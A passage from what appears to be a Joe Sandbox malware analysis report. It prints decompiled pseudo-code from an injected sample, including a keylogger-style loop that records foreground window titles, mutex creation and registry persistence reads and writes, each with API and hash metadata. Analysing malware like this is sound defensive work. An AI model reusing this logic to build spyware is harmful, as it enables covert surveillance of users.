				void* _t33;
				void* _t34;
				void* _t57;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t33);
				_t59 = _t34;
				_t61 = _t34 + 0x60;
				while(1) {
					E00435760(_t57,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = E00401F8B(E00401E45(0x473298, _t55, _t61, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040415E(_t33, _t66, _t55, _t61, _t15);
						_t17 = E0041AECA( &_v2012, _t55); // executed
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4); // executed
					}
					_t55 = E004042DC(_t33,  &_v2056, L"\r\n[ ", _t61, __eflags, E0040415E(_t33,  &_v2028, _t55, _t61,  &_v2004));
					E00401EF3(_t59 + 4, _t20, _t59, E00402FF4(_t33,  &_v2080, _t20, _t57, _t61, __eflags, L" ]\r\n"));
					E00401EE9();
					E00401EE9();
					E00401EE9();
					_t67 = _t65 - 0x18;
					E004086D0(_t33, _t67, _t55, __eflags, _t61);
					E0040977E(_t59, _t55);
					while(1) {
						_t29 = E00401F8B(E00401E45(0x473298, _t55, _t61, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040415E(_t33, _t68, _t55, _t61, _t29);
						_t31 = E0041AECA(0, _t55);
						_t64 = _t68 + 0x18;
						__eflags = _t31;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E0040A64F(_t33, _t59, _t55);
				}
			}


























                    0x00409a7d
                    0x00409a7d
                    0x00409a80
                    0x00409a86
                    0x00409a89
                    0x00409a8b
                    0x00409a8e
                    0x00409a9a
                    0x00409a9f
                    0x00409aa2
                    0x00409ab0
                    0x00409ab5
                    0x00409abb
                    0x00409ac4
                    0x00409ac9
                    0x00409acc
                    0x00409ace
                    0x00000000
                    0x00000000
                    0x00409ad5
                    0x00409ad5
                    0x00409b00
                    0x00409b10
                    0x00409b19
                    0x00409b22
                    0x00409b2b
                    0x00409b30
                    0x00409b36
                    0x00409b3d
                    0x00409b42
                    0x00409b50
                    0x00409b55
                    0x00409b5b
                    0x00409b62
                    0x00409b67
                    0x00409b6a
                    0x00409b6c
                    0x00000000
                    0x00000000
                    0x00409b70
                    0x00409b70
                    0x00409b7a
                    0x00409b7a

                    APIs
                      • Part of subcall function 0041AECA: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041AEDA
                      • Part of subcall function 0041AECA: GetWindowTextLengthW.USER32(00000000), ref: 0041AEE3
                      • Part of subcall function 0041AECA: GetWindowTextW.USER32 ref: 0041AF0D
                    • Sleep.KERNELBASE(000001F4), ref: 00409AD5
                    • Sleep.KERNEL32(00000064), ref: 00409B70
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    • Opcode ID: e923d892bc4c43722fe5f07cea3606dc1b25639ecdb9401fba0249c39de61a18
                    • Instruction ID: c75d603df524a244733055fbd34c65f055766319f874fab2ee06841349c314ac
                    • Opcode Fuzzy Hash: e923d892bc4c43722fe5f07cea3606dc1b25639ecdb9401fba0249c39de61a18
                    • Instruction Fuzzy Hash: 9821AE3160420057C608BB76DC179AE76A99F91308F40057FF952771D3EE7DAA09869F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040949A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 90%
                    			E0040949A(void* __ebx, void* __edi, void* __eflags, char _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
				char _v28;
				char _v52;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t24;
				void* _t25;
				void* _t36;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t77;

				_t47 = __ebx;
				_t77 = _t76 - 0x4c;
				 *0x46f9d4 = _a4;
				_push(_t72);
				E00401F66(__ebx,  &_v28);
				_t24 = E0043A3D6(_a12);
				_t69 = _a8;
				if(_t24 != 0) {
					_t25 = E0040CF38( &_v52, _t69, _a12); // executed
					E00401EF3(0x4730b8, _t69, 0x4730b8, _t25);
					E00401EE9();
					_t69 = E004087F0( &_v76, 0x4730b8, _t75, "\\");
					E00401EF3( &_v28, _t28, 0x4730b8, E00402FF4(__ebx,  &_v52, _t28, __edi, _t75, __eflags, _a16));
					E00401EE9();
				} else {
					E00401EF3( &_v28, _t69, _t72, E0040CF38( &_v52, _t69, _a16));
				}
				E00401EE9();
				 *0x4730ec =  *0x4730ec & 0x00000000;
				 *0x4730e8 = _a20 * 0x3e8;
				 *0x47308b = _a24;
				_t36 =  *0x46f9d4 - 0x31;
				if(_t36 == 0) {
					E004086D0(_t47, _t77 - 0x18, _t69, __eflags,  &_v28);
					E0040977E(0x473040, _t69);
				} else {
					_t83 = _t36 == 1;
					if(_t36 == 1) {
						E004086D0(_t47, _t77 - 0x18, _t69, _t83,  &_v28);
						E00409835(0x473040);
					}
				}
				return E00401EE9();
			}















                    0x0040949a
                    0x004094a3
                    0x004094a6
                    0x004094ab
                    0x004094ac
                    0x004094b4
                    0x004094b9
                    0x004094c2
                    0x004094de
                    0x004094ec
                    0x004094f4
                    0x0040950c
                    0x0040951b
                    0x00409523
                    0x004094c4
                    0x004094d1
                    0x004094d6
                    0x0040952b
                    0x00409537
                    0x0040953e
                    0x00409546
                    0x00409552
                    0x00409555
                    0x0040957f
                    0x00409589
                    0x00409557
                    0x00409557
                    0x0040955a
                    0x00409565
                    0x0040956f
                    0x0040956f
                    0x0040955a
                    0x0040959a

                    APIs
                    • _wcslen.LIBCMT ref: 004094B4
                      • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409806
                      • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409816
                      • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409822
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$_wcslen
                    • String ID: @0G$@0G
                    • API String ID: 1119755333-1610251930
                    • Opcode ID: 055a1be09140d5878e4de41385cde3ef7ff32f363c00fe368b3632d24af4b983
                    • Instruction ID: 8240ad2e3e1aaba782ca1c27cc07c235db1714dcc0b5eaf1d0f18af9b8f17ace
                    • Opcode Fuzzy Hash: 055a1be09140d5878e4de41385cde3ef7ff32f363c00fe368b3632d24af4b983
                    • Instruction Fuzzy Hash: 81216171914149AACB05FFA6EC528EE7B78AE11304F00403FF805721E7DE385A59D7DA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C577 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040C577() {
				void* _t4;

				_t4 = CreateMutexA(0, 1, E00401F8B(0x473268)); // executed
				 *0x470d44 = _t4;
				return 0 | GetLastError() != 0x000000b7;
			}




                    0x0040c586
                    0x0040c58c
                    0x0040c5a3

                    APIs
                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040E146,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 0040C586
                    • GetLastError.KERNEL32 ref: 0040C591
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastMutex
                    • String ID: h2G
                    • API String ID: 1925916568-3159213000
                    • Opcode ID: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                    • Instruction ID: e6373a13d656ff6d6707b7a2cb114a9c32d4b8c21df5bc8e6e0dabda27f4a646
                    • Opcode Fuzzy Hash: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                    • Instruction Fuzzy Hash: 1CD01270709301DBD7141B74AC5976C35609B44703F0044B9F50BD55D1DB788480951A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041AECA Relevance: 4.6, APIs: 3, Instructions: 108COMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E0041AECA(intOrPtr __ecx, void* __edx, char _a4) {
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				char _v64;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HWND__* _t24;
				intOrPtr* _t32;
				intOrPtr* _t34;
				void* _t42;
				signed int _t53;
				void* _t77;
				struct HWND__* _t79;
				signed short _t82;
				int _t84;
				int _t86;
				intOrPtr _t89;
				void* _t90;
				signed int _t91;
				void* _t93;

				_t77 = __edx;
				_t93 = (_t91 & 0xfffffff8) - 0x3c;
				_v60 = __ecx;
				_t24 = GetForegroundWindow(); // executed
				_t79 = _t24;
				_t84 = GetWindowTextLengthW(_t79);
				_t53 = 0;
				_t97 = _t84;
				if(_t84 == 0) {
					L6:
					E00401EE9();
					return _t53;
				}
				_t86 = _t84 + 1;
				E0040AE7E(0,  &_v28, _t77, _t79, _t90, _t86, 0);
				GetWindowTextW(_t79, E00401EE4( &_v36), _t86);
				_t32 = E004022E5( &_v36,  &_v64);
				_t34 = E004022AA( &_v40,  &_v64);
				E00409291( &_v64,  *((intOrPtr*)(E004022E5( &_v44,  &_v64))),  *_t34,  *_t32);
				_t94 = _t93 - 0xc;
				E0040415E(0, _t93 - 0xc, _t77, _t90, ";");
				E004086D0(0, _t94 - 0x18, _t77, _t97,  &_a4);
				E0041AA44( &_v68, _t77); // executed
				_t82 = 0;
				_t42 = E004021DA( &_v68);
				_t98 = _t42;
				if(_t42 == 0) {
					L5:
					E00406150( &_v40);
					E00401EE9();
					goto L6;
				}
				_t88 = 0;
				while(E00409114( &_v32, E00401E45( &_v40, _t77, _t90, _t98, _t88), _t53) == 0xffffffff) {
					_t82 = _t82 + 1;
					_t88 = _t82 & 0x0000ffff;
					if((_t82 & 0x0000ffff) < E004021DA( &_v40)) {
						continue;
					}
					goto L5;
				}
				_t89 = _v60;
				__eflags = _t89;
				if(_t89 != 0) {
					E0043E0D9(_t89, E00401EE4( &_v28));
				}
				E00406150( &_v40);
				E00401EE9();
				_t53 = 1;
				goto L6;
			}




























                    0x0041aeca
                    0x0041aed0
                    0x0041aed6
                    0x0041aeda
                    0x0041aee0
                    0x0041aee9
                    0x0041aeeb
                    0x0041aeed
                    0x0041aeef
                    0x0041afc7
                    0x0041afca
                    0x0041afd7
                    0x0041afd7
                    0x0041aef6
                    0x0041aefc
                    0x0041af0d
                    0x0041af1c
                    0x0041af2c
                    0x0041af4b
                    0x0041af50
                    0x0041af5a
                    0x0041af68
                    0x0041af71
                    0x0041af7d
                    0x0041af7f
                    0x0041af84
                    0x0041af86
                    0x0041afb5
                    0x0041afb9
                    0x0041afc2
                    0x00000000
                    0x0041afc2
                    0x0041af88
                    0x0041af8a
                    0x0041afa4
                    0x0041afa9
                    0x0041afb3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041afb3
                    0x0041afd8
                    0x0041afdc
                    0x0041afde
                    0x0041afeb
                    0x0041aff1
                    0x0041aff6
                    0x0041afff
                    0x0041b004
                    0x00000000

                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041AEDA
                    • GetWindowTextLengthW.USER32(00000000), ref: 0041AEE3
                    • GetWindowTextW.USER32 ref: 0041AF0D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Text$ForegroundLength
                    • String ID:
                    • API String ID: 1471897267-0
                    • Opcode ID: 15937a727bc4928d59a9533aeff3f2e16f904e2e8cea49d191c50395206b3a62
                    • Instruction ID: 3e28b6e538d4d9c8fb8f0e503eff1941d55928bfac05a0f95e1812ca3ce68f86
                    • Opcode Fuzzy Hash: 15937a727bc4928d59a9533aeff3f2e16f904e2e8cea49d191c50395206b3a62
                    • Instruction Fuzzy Hash: B83186724152016BC604FB62D9968AFB3E8EE94718F40053FFC42631D2EF389E59C69B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041288E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E0041288E(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				void* __ebp;
				long _t11;
				long _t16;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t26;

				_t22 = __edx;
				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_t21 = _t23;
					goto L4;
				} else {
					_t16 = RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8); // executed
					_t21 = _t23;
					if(_t16 != 0) {
						L4:
						_push(0x464074);
					} else {
						_push( &_v1036);
					}
				}
				E00402073(_t19, _t21, _t22, _t26);
				return _t23;
			}













                    0x0041288e
                    0x0041289c
                    0x004128ab
                    0x004128b2
                    0x004128ba
                    0x004128ef
                    0x00000000
                    0x004128bc
                    0x004128cf
                    0x004128da
                    0x004128e0
                    0x004128e4
                    0x004128f1
                    0x004128f1
                    0x004128e6
                    0x004128ec
                    0x004128ec
                    0x004128e4
                    0x004128f6
                    0x00412902

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                    • RegCloseKey.KERNELBASE(?), ref: 004128DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                    • Instruction ID: fa08edaff8def4b33d2b8c01463c49d1e7a9fcd5e8e464c1f7b2d0f15f6578c3
                    • Opcode Fuzzy Hash: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                    • Instruction Fuzzy Hash: 0701DB76A00228BBDB205B95DD08DDF7FBDEB44751F004166BF04E2140D6748E55D7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004129E0 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004129E0(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v12;
				char _v1040;
				long _t14;
				long _t17;

				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12); // executed
				if(_t14 != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12); // executed
				RegCloseKey(_v12); // executed
				if(_t17 != 0) {
					goto L3;
				}
				E0040632B( &_v1040, _a16, _a20);
				E004063B0( &_v1040, _a8, _a12);
				return 1;
			}







                    0x004129fc
                    0x00412a04
                    0x00412a50
                    0x00000000
                    0x00412a50
                    0x00412a15
                    0x00412a20
                    0x00412a28
                    0x00000000
                    0x00000000
                    0x00412a36
                    0x00412a47
                    0x00000000

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                    • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                    • RegCloseKey.KERNELBASE(00000000), ref: 00412A20
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: af865eae7d0f815a5e3d820a062f3159d6a947a14fc4738be47aa37cdfc07ac2
                    • Instruction ID: e757102b5f9edeaa3f49f94b8a259336416bdafea7ca2c6cdfa4676243748901
                    • Opcode Fuzzy Hash: af865eae7d0f815a5e3d820a062f3159d6a947a14fc4738be47aa37cdfc07ac2
                    • Instruction Fuzzy Hash: 87018B31400229BBCF219F91EC04DEB7F68EF05750F004065BE09A2161D63589B5DBE4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412831 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00412831(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}










                    0x00412839
                    0x0041283a
                    0x0041283d
                    0x00412851
                    0x00412859
                    0x00000000
                    0x00412888
                    0x0041286f
                    0x0041287a
                    0x00000000

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                    • RegCloseKey.KERNELBASE(?), ref: 0041287A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                    • Instruction ID: 69e43ff86f888a52894dd2156315322568ee34e4473ddb17d5254d30eae93871
                    • Opcode Fuzzy Hash: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                    • Instruction Fuzzy Hash: 38F06D7294020CBFDF109FA0AD05FEEBBBCEB04B11F1041A1FA04E6191D2748A549B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004127E7 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004127E7(void* __ecx, char* __edx, char* _a4) {
				void* _v8;
				long _t8;
				signed int _t9;
				long _t10;
				signed int _t11;

				_t8 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t8 != 0) {
					_t9 = 0;
				} else {
					_t10 = RegQueryValueExA(_v8, _a4, 0, 0, 0, 0); // executed
					_t11 = RegCloseKey(_v8); // executed
					_t9 = _t11 & 0xffffff00 | _t10 == 0x00000000;
				}
				return _t9;
			}








                    0x004127fe
                    0x00412806
                    0x0041282a
                    0x00412808
                    0x00412812
                    0x0041281d
                    0x00412825
                    0x00412825
                    0x00412830

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                    • RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                    • Instruction ID: 84763f97e707706bd7246b5a08c576b286280a2d5f648d27a36c848fc85b91b7
                    • Opcode Fuzzy Hash: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                    • Instruction Fuzzy Hash: 9CE06531905338BB9B205BA2AD0DDEB7FACDF06BA1B010165BD09A1151D2658E50E6E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412B5F Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00412B5F(void* __ecx, char* __edx, char* _a4, char _a8) {
				void* _v8;
				long _t9;
				long _t12;

				_t9 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t9 != 0) {
					return 0;
				}
				_t12 = RegSetValueExA(_v8, _a4, 0, 4,  &_a8, 4); // executed
				return RegCloseKey(_v8) & 0xffffff00 | _t12 == 0x00000000;
			}






                    0x00412b6d
                    0x00412b75
                    0x00000000
                    0x00412ba1
                    0x00412b88
                    0x00000000

                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00412B6D
                    • RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004,00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000), ref: 00412B88
                    • RegCloseKey.ADVAPI32(00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000,00000000), ref: 00412B93
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID:
                    • API String ID: 1818849710-0
                    • Opcode ID: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                    • Instruction ID: f68fcc0987728696b45baa029fbd8ba208f586d8d4f13f853052a764fd9765f2
                    • Opcode Fuzzy Hash: 61de9578f52ee8f0e092330830a64b9a8e5eb202a0654fe1bc12343b251ebfa2
                    • Instruction Fuzzy Hash: 13E06D72544308FFDF109FA0ED05FEA7BACEB04BA1F1040A5BF09E6191D2759E14A7A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00444A38 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E00444A38(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0043EEAD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x470a5c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00443E46();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00441850(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}








                    0x00444a38
                    0x00444a3e
                    0x00444a44
                    0x00444a76
                    0x00444a7b
                    0x00444a81
                    0x00000000
                    0x00444a81
                    0x00444a48
                    0x00444a4a
                    0x00444a4a
                    0x00444a61
                    0x00444a6a
                    0x00444a72
                    0x00000000
                    0x00000000
                    0x00444a52
                    0x00444a54
                    0x00000000
                    0x00000000
                    0x00444a57
                    0x00444a5c
                    0x00444a5d
                    0x00444a5f
                    0x00000000
                    0x00000000
                    0x00444a5f
                    0x00000000

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: P@
                    • API String ID: 1279760036-676759640
                    • Opcode ID: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                    • Instruction ID: fd7924e8b65afa23adb338f609f8de03ed02b176ca6f4a568383a370c07dd500
                    • Opcode Fuzzy Hash: 9797f3068208b50acbf799f5f92ac938ca8f5a32afd615d80b0c57cacc916379
                    • Instruction Fuzzy Hash: 69E0ED31581220AAF7307A669C05B6B3A8C9BD17B1F195027AC19B2AD4CB28CD0082ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409835 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00409835(void* __ecx, char _a4) {

				_t2 = __ecx + 0x60; // 0x4730a0
				E0040AE66(_t2,  &_a4);
				if( *((char*)(__ecx + 0x49)) == 0) {
					CreateThread(0, 0, E00409876, __ecx, 0, 0); // executed
				}
				return E00401EE9();
			}



                    0x0040983d
                    0x00409840
                    0x00409849
                    0x00409857
                    0x00409857
                    0x00409867

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID: Cqt
                    • API String ID: 2422867632-953143165
                    • Opcode ID: 816f62b2a08f7929e319e9c8b7fa4dab219abdebc3aecd6f7c4b7e66061ccfe4
                    • Instruction ID: d85add00c6f42117d705990aaefaa63471e6bdc8539aebbfc732e64b21dd5a73
                    • Opcode Fuzzy Hash: 816f62b2a08f7929e319e9c8b7fa4dab219abdebc3aecd6f7c4b7e66061ccfe4
                    • Instruction Fuzzy Hash: EDE08CB24242156ED320A631DC44DFB7A9C9B01354F00883FB84691192DA34AD4887A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A311 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A311(intOrPtr* __ecx) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				 *__ecx = _v68.ullTotalPhys;
				_t8 = _v68.ullAvailPhys;
				 *((intOrPtr*)(__ecx + 4)) = _t8;
				return _t8;
			}





                    0x0041a31b
                    0x0041a325
                    0x0041a32e
                    0x0041a330
                    0x0041a333
                    0x0041a33a

                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041A325
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID: @
                    • API String ID: 1890195054-2766056989
                    • Opcode ID: 0dbc19bfcd94d8fe6ca99b922c2f6ba12b8aacba69d254520a1911864a253c2a
                    • Instruction ID: 38d0445fa6610dd558ee3faa9e7677437f9bbe62d097060465829832e2d10611
                    • Opcode Fuzzy Hash: 0dbc19bfcd94d8fe6ca99b922c2f6ba12b8aacba69d254520a1911864a253c2a
                    • Instruction Fuzzy Hash: 90D017B58023189FCB20DFA8E905A8EBBFCEB08210F00416AEC49E3300E770A8018B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00444A86 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E00444A86(void* __ecx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t13;
				long _t15;

				_t10 = __ecx;
				_t13 = _a4;
				if(_t13 != 0) {
					_t15 = _a8;
					__eflags = _t15;
					if(_t15 != 0) {
						__eflags = _t15 - 0xffffffe0;
						if(_t15 <= 0xffffffe0) {
							while(1) {
